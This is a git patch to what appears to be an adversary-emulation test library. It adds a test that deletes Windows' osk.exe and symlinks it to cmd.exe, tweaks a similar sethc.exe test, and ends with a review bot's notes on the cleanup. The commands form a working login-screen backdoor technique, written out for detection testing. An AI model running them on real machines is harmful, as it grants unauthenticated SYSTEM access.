From 8300ec7632cd47e34fb9e1e97f6e527ad3352b4e Mon Sep 17 00:00:00 2001
From: Carrie Roberts
Date: Wed, 2 Nov 2022 10:54:33 -0700
Subject: [PATCH] Create Symbolic Link From osk.exe to cmd.exe (#2218)
* Create Symbolic Link From osk.exe to cmd.exe
* Update T1546.008.yaml
---
 atomics/T1546.008/T1546.008.yaml | 28 ++++++++++++++++++++++++++--
 1 file changed, 26 insertions(+), 2 deletions(-)
diff --git a/atomics/T1546.008/T1546.008.yaml b/atomics/T1546.008/T1546.008.yaml
index f4fbadb0..0971ed73 100644
--- a/atomics/T1546.008/T1546.008.yaml
+++ b/atomics/T1546.008/T1546.008.yaml
@@ -54,11 +54,35 @@ atomic_tests:
 - windows
 executor:
 command: |
- copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe
+ IF NOT EXIST C:\Windows\System32\sethc_backup.exe (copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe) ELSE ( pushd )
 takeown /F C:\Windows\System32\sethc.exe /A
 icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t
 copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
 cleanup_command: |
 copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe
 name: command_prompt
- elevation_required: true
\ No newline at end of file
+ elevation_required: true
+- name: Create Symbolic Link From osk.exe to cmd.exe
+ description: |
+ Replace accessiblity executable with cmd.exe to provide elevated command prompt from login screen without logging in.
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ IF NOT EXIST %windir%\System32\osk.exe.bak (copy %windir%\System32\osk.exe %windir%\System32\osk.exe.bak) ELSE ( pushd )
+ takeown /F %windir%\System32\osk.exe /A
+ icacls %windir%\System32\osk.exe /grant Administrators:F /t
+ del %windir%\System32\osk.exe
+ mklink %windir%\System32\osk.exe %windir%\System32\cmd.exe
+ cleanup_command: |
+ takeown /F %windir%\System32\osk.exe /A
+ icacls %windir%\System32\osk.exe /grant Administrators:F /t
+ del %windir%\System32\osk.exe
+ copy /Y %windir%\System32\osk.exe.bak %windir%\System32\osk.exe
+ icacls %windir%\system32\osk.exe /inheritance:d
+ icacls %windir%\system32\osk.exe /setowner "NT SERVICE\TrustedInstaller"
+ icacls %windir%\System32\osk.exe /grant "NT SERVICE\TrustedInstaller":F /t
+ icacls %windir%\system32\osk.exe /grant:r SYSTEM:RX
+ icacls %windir%\system32\osk.exe /grant:r Administrators:RX
+ name: command_prompt
+ elevation_required: true
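Review bot: The new test's cleanup_command deletes the symlink and copies osk.exe.bak back over osk.exe, but never removes osk.exe.bak, so a copy of the original accessibility binary stays in System32 after cleanup; either append `del %windir%\System32\osk.exe.bak` as the last cleanup line or state in the description that the backup is left in place. The `ELSE ( pushd )` on the backup line, and the same construct added to the sethc test at the top of the hunk, is not a real no-op but a command that prints the directory stack; `ELSE ( rem backup already exists )` reads as intended and produces no output. The description misspells "accessibility" and says the executable is replaced although the command creates a symbolic link with mklink, which is also the artifact a defender would hunt for (a reparse point where a signed System32 binary should be); `Create a symbolic link named osk.exe that points at cmd.exe, so the on-screen keyboard option on the login screen opens a SYSTEM command prompt without logging in.` would be more precise. The icacls sequence in cleanup appears to approximate the stock owner and ACL of osk.exe rather than restore a captured one, so a comment such as `# restores the usual TrustedInstaller owner and RX grants; verify against a clean system` would help whoever maintains it.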